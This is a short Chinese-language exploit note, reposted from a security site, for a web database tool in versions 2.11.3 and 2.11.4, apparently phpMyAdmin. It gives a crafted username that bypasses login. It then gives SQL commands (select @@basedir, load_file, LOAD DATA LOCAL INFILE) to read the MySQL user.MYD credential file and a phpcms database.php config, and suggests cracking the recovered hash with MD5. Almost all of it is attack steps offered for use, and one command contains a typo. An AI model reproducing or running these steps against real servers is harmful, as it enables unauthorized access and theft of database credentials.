转自:https://paper.tuisec.win/detail.jsp?id=1810f8532d4fbf4
漏洞详情:
影响版本:2.11.3 / 2.11.4
利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
若登陆成功,且用户具有读取数据库的权限,可继续操作
获取mysql安装路径 select @@basedir
获取mysql的路径后,可以知道root密码信息存在 /data/mysql/user.MYD中,则进行sql读取:
select load_file('xx/xx//data/mysql/user.MYD')
但结果为NULL =,=
换种读取方式: create table `test`.`a`(`a1` text not null)//在test这个库创建一个表名为a字段名为a1的表
同样失败
最后
load data local infile "xx/xx//data/mysql/user.MYD" into table a fileds terminated by '' lines terminated by '\0';
其中,fileds terminated by ''指字段之间用''分隔,lines terminated by '\0'指每行之间用'\0'分隔
可以用md5跑,可能会失败
另外一种:若是phpcms程序,则读取database.php文件
LOAD DATA LOCAL INFILE 'E:\\wamp\\www\\caches\\configs\\database.php'
INTO TABLE a fields terminated by '' LINES TERMINATED BY '\0';